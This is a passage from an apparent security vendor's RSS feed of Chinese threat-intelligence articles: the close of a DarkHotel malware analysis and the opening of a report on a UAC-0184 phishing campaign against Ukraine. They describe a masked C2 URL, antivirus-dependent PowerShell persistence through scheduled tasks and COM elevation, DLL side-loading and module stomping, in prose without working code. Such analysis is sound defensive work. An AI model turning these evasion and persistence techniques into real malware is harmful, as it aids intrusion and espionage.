leaf="">构建url：https[:]//backup.***.com/bd3/j3/b99731f78b_985751?pt=a2&amp;at=pp&amp;bn=7601.18847&amp;ay=0，其中bn是系统版本，ay是数字列表代表的杀软安装情况。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">构建的url用于填充到Powershell脚本中。这个脚本的内容与年初攻击中使用的一致。在不同的杀软存在时以不同的形态存在：存在360时，路径为%windir%\temp\drivermon.ps1；存在Avast时，路径%windir%\temp\ypp.db；都不存在时，明文代码直接出现在命令行中。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100024117" data-ratio="0.4208092485549133" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=21c18b75&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpASZh1iaKBrQjGVJDut7twYfUicS9Hr7r6WfnnkxomSqUEtgkRKhRzzl6s4XzHicaRCJFvoWOv0VsuA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">创建执行Powershell的计划任务，这里又有两种情况：存在360或卡巴斯基时，直接使用com接口创建计划任务；都不存在时，则利用com提权执行另外一段Powershell来创建计划任务。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100024118" data-ratio="0.7121387283236994" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=8545fd68&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpASZh1iaKBrQjGVJDut7twYnWLWG3h3oydBoIbJFsmB5JhWSrKlkXNAIoqhooGvfC92icpzMrNDdgg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong style="color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">3. 综合执行路径</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">在面对比较“危险”的环境时，恶意安装程序会利用Shellcode进行一次提权再执行真实功能，所以导致程序的执行路径有一点复杂，所以用下面的流程图来直观展示程序的执行路径。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100024119" data-ratio="0.7791907514450868" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=fe569666&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpASZh1iaKBrQjGVJDut7twYicavkW3zslT4vlQT5RFcmz3VibAbqIwkrYZyzl4sCuKK1YZT2cnEVEFQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="3 11 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-role="outer"><div data-tools="135编辑器" data-id="101849"><div style="margin-top: 10px;margin-bottom: 10px;"><div style="margin-bottom: -15px;display: flex;transform: rotate(0deg);"><p data-brushtype="text" style="padding-right: 1em;padding-left: 1em;color: rgb(242, 242, 242);line-height: 32px;height: 32px;font-size: 16px;background-color: rgb(190, 25, 31);letter-spacing: 1.5px;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="font-size: 17px;"><span leaf="">总结</span></span></strong></span></p></div><div style="margin-left: 6px;padding: 30px 15px 10px;background-color: rgb(242, 242, 242);flex-shrink: 0;"><div data-autoskip="1" style="line-height: 1.75em;letter-spacing: 1.5px;font-size: 14px;"><p style="text-indent: 2em;"><span style="color: rgb(51, 51, 51);font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;color: rgb(51, 51, 51);letter-spacing: 1.5px;text-indent: 28px;background-color: rgb(242, 242, 242);"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">总的来说，本次攻击活动作为APT-C-06（DarkHotel）2025前两次攻击活动的延续并没有什么新的东西。从受影响用户上出现的种类多样的恶意安装程序，并且恶意程序的出现有聚集特征（一个U盘下的exe程序全是恶意程序）来看，这些恶意程序可能是由某一个程序感染了U盘中的exe程序，目前的载荷中没有发现感染功能。</span></span></span></span></p></div></div></div></div></div></div></div></div><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer"><div data-role="paragraph"><div data-role="outer" label="edit by 135editor"><div data-role="paragraph" style="margin-top: 24px;margin-bottom: 24px;" data-pm-slice="6 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-role="outer" label="edit by 135editor"><div data-role="title" data-tools="135编辑器" data-id="85638"><div style="margin-top: 2em;margin-right: auto;margin-left: auto;padding-top: 0.5em;padding-bottom: 0.5em;border-right: none;border-bottom: none;border-left: none;border-top: 1px solid rgb(204, 204, 204);font-size: 1em;font-weight: inherit;text-decoration: inherit;color: rgb(166, 166, 166);font-family: inherit;"><p style="margin-top: -1.2em;text-align: center;border-width: initial;border-style: none;border-color: initial;line-height: 1.4;"><span style="font-size: 16px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="font-size: 16px;background-color: rgb(15, 15, 25);border-color: rgb(183, 184, 184);color: rgb(255, 255, 255);padding: 8px 23px;text-decoration: inherit;"><span leaf="">参考</span></span></strong></span></p></div></div></div><p><span style="font-size: 15px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;text-indent: -21pt;letter-spacing: 0.034em;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">[1]<a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&amp;mid=2247507142&amp;idx=1&amp;sn=e22c82e0641be2e7db4310d60668fd2b&amp;scene=21#wechat_redirect" textvalue="APT-C-06（DarkHotel）利用恶意软件为诱饵的攻击活动" data-itemshowtype="0" linktype="text" data-linktype="2">APT-C-06（DarkHotel）利用恶意软件为诱饵的攻击活动</a></span></span></p><p><span style="font-size: 15px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;text-indent: -21pt;letter-spacing: 0.034em;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">[2]<a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&amp;mid=2247506352&amp;idx=1&amp;sn=c9c57e22e7b3300fe2c7d07520d1f339&amp;scene=21#wechat_redirect" textvalue="APT-C-06（DarkHotel）利用BYOVD技术的最新攻击活动分析" data-itemshowtype="0" linktype="text" data-linktype="2">APT-C-06（DarkHotel）利用BYOVD技术的最新攻击活动分析</a></span></span></p></div></div></div></div><div data-role="outer" label="Powered by 135editor.com"><div data-role="outer" label="Powered by 135editor.com"><div data-tools="135编辑器" data-id="98507" style="color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><div style="margin: 10px auto;text-align: center;line-height: 1.5em;"><div style="padding-bottom: 3px;display: flex;justify-content: center;align-items: center;border-bottom: 1px solid rgb(190, 25, 31);"><p data-brushtype="text" style="padding-right: 8px;padding-left: 8px;font-size: 16px;letter-spacing: 1.5px;transform: rotate(0deg);"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span leaf="">团队介绍</span></strong></span></p></div></div><p style="padding-top: 4px;padding-bottom: 4px;font-size: 12px;letter-spacing: 1.5px;line-height: 1.5em;text-align: center;transform: rotate(0deg);"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">TEAM INTRODUCTION</span></span></p></div><div data-role="paragraph" style="color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><p style="min-height: 1em;letter-spacing: 0.544px;line-height: 1.5em;font-family: -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><span style="color: rgb(190, 25, 31);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="font-size: 15px;color: rgb(190, 25, 31);"><span leaf="">360</span></span></strong><strong><span style="font-size: 15px;color: rgb(190, 25, 31);"><span leaf="">高级威胁研究院</span></span></strong></span></p><p style="min-height: 1em;letter-spacing: 0.544px;line-height: 1.5em;font-family: -apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><span style="color: rgb(136, 136, 136);font-size: 14px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">360高级威胁研究院是360数字安全集团的核心能力支持部门，由360资深安全专家组成，专注于高级威胁的发现、防御、处置和研究，曾在全球范围内率先捕获双杀、双星、噩梦公式等多起业界知名的0day在野攻击，独家披露多个国家级APT组织的高级行动，赢得业内外的广泛认可，为360保障国家网络安全提供有力支撑。</span></span></p></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="%27%27">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=021516b9&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUyMjk4NzExMA%3D%3D%26mid%3D2247507786%26idx%3D1%26sn%3Db66895d9e7266b8b68e975fea5b15f96">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 14 Jan 2026 17:30:00 +0800</pubDate>
    </item>
    <item>
      <title>UAC-0184 | &#34;阵亡档案黑幕&#34;钓鱼行动</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&amp;mid=2247507757&amp;idx=1&amp;sn=cf6b118e88395af45a000aae80811264</link>
      <description>360高级威胁研究院近期监测数据显示，UAC-0184组织正在进行以乌军人档案遭篡改，拒付阵亡赔偿向最高拉达发起质询的网络钓鱼攻击活动。</description>
      <content:encoded><![CDATA[<p>原创 <span>高级威胁研究院</span> <span>2025-12-26 17:30</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=df61dafa&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F6CNEHNicic4Pof3N73ShauArZAYicEJS00uWouiahQFgYft0KusicYToWXibCibIJDmq6aIboicG2M3fgeoic7AWJtRqibsA%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>360高级威胁研究院近期监测数据显示，UAC-0184组织正在进行以乌军人档案遭篡改，拒付阵亡赔偿向最高拉达发起质询的网络钓鱼攻击活动。</p>
  <div data-role="outer" label="edit by 135editor"><div data-tools="135编辑器" data-id="16"><div style="background-color: rgb(245, 245, 244);border-color: rgb(245, 245, 244);color: rgb(33, 33, 34);border-radius: 4px;font-size: 14px;letter-spacing: 1.5px;line-height: 1.75em;padding: 1em 0.8em;margin: 10px auto;" data-pm-slice="5 5 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-tools&#34;:&#34;135编辑器&#34;,&#34;data-id&#34;:&#34;16&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><p style="text-indent: 28px;margin-bottom: 8px;margin-top: 8px;line-height: 1.6em;"><span style="line-height: 150%;font-size: 17px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="line-height: 150%;font-size: 17px;color: rgb(33, 33, 34);letter-spacing: 1.5px;text-indent: 28px;background-color: rgb(245, 245, 244);"><span leaf="">UAC-0184（也被追踪为Hive0156）是一个与俄罗斯结盟的威胁行为者，主要使用商用恶意软件和诱饵文档在乌克兰策划恶意网络攻击活动。通过投放恶意LNK文件或PowerShell脚本攻击乌克兰军事人员，导致Remcos感染。该组织使用的诱饵文档主题与关注乌克兰军方作战态势的人员高度相关。</span></span></span></p></div></div></div><p style="margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;,&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span style="background-color: rgb(190, 25, 31);font-size: 18px;"><strong><span style="background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);"><span leaf=""> 一、概述 </span></span></strong></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">360高级威胁研究院近期监测数据显示，</span><span leaf="">UAC-0184组织针对乌克兰最高拉达发起网络钓鱼攻击活动，内容涉及乌克兰军人档案被篡改及拒付阵亡赔偿等敏感议题。该组织在2025年持续针对乌克兰军事和政府部门开展高密度情报窃取活动，本报告据此展开专项分析，建议相关机构及人员强化安全防护意识，加强涉密情报与用户数据的加密保护及访问控制，有效防范恶意攻击导致的信息泄露风险。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="background-color: rgb(190, 25, 31);font-size: 18px;"><strong><span style="background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;,&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background-color: rgb(190, 25, 31);font-size: 18px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"> 二、攻击链分析 </span></span></strong></span></span></p><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img" data-imgfileid="100024087" data-ratio="0.45614035087719296" data-s="300,640" type="block" data-type="jpeg" data-w="855" src="https://wechat2rss.xlab.app/img-proxy/?k=40fb72fe&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F6CNEHNicic4PotKia6NicZdwJRosLOk5XkJDdBBlooPLkM0hEllxVvXS7rtV7NSvyp0biaHhVbFFxfLich3Ds7ULDjhw%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">本次攻击活动利用即时通讯软件Viber作为初始入侵渠道，通过社会工程学诱饵分发恶意压缩包。攻击链具有高度的复杂性，结合了DLL侧加载（DLL Side-Loading）、非标准控制流转移以及双重模块踩踏（Module Stomping）技术，旨在规避安全检测并最终植入HijackLoader以加载Remcos RAT。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 